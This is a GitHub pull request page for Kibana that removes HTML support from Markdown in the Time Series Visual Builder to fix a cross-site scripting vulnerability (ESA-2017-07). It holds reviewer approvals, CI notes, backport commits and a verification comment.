Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ESA-2017-07 Remove HTML support from Markdown for Time Series Visual Builder #11770

Merged
merged 3 commits into from May 15, 2017

Conversation

Projects
None yet
5 participants
@simianhacker
Copy link
Member

commented May 12, 2017

The time series visual builder that was released in 5.4.0 is vulnerable to a cross-site scripting attack (XSS), where a malicious user could embed HTML into markdown documents that could result in JavaScript being executed in other users' browsers. This could be abused to steal sensitive information or to perform destructive actions on behalf of other users. 5.4.1 fixes this vulnerability by no longer allowing HTML in markdown documents.


This PR removes the HTML support for Markdown in Time Series Visual Builder to be consistent with the Markdown behavior else where in Kibana.

CC: @epixa

@rashidkpc

This comment has been minimized.

Copy link
Member

commented May 12, 2017

LGTM. Wait for the tests and merge it.

@simianhacker

This comment has been minimized.

Copy link
Member Author

commented May 12, 2017

Jenkins test this

@s1monw

This comment has been minimized.

Copy link

commented May 15, 2017

LGTM 2 and that means a lot!

@epixa

This comment has been minimized.

Copy link
Member

commented May 15, 2017

This test failure is unrelated, I'm going to get this change in.

@epixa epixa merged commit 8b31d55 into elastic:master May 15, 2017

1 of 2 checks passed

kibana-ci Build finished.
Details
CLA Commit author has signed the CLA
Details

epixa added a commit that referenced this pull request May 15, 2017

epixa added a commit that referenced this pull request May 15, 2017

@epixa

This comment has been minimized.

Copy link
Member

commented May 15, 2017

5.x 6413a86
5.4 913ee1f

@rasroh

This comment has been minimized.

Copy link
Contributor

commented May 15, 2017

verified this on the latest build ( BC3 of 5.4.1) and HTML code does not render as expected in Markdown - TSVB.

@epixa epixa changed the title Remove HTML support from Markdown for Time Series Visual Builder ESA-2017-07 Remove HTML support from Markdown for Time Series Visual Builder Jun 1, 2017

@epixa epixa added the v6.0.0-alpha2 label Jun 2, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.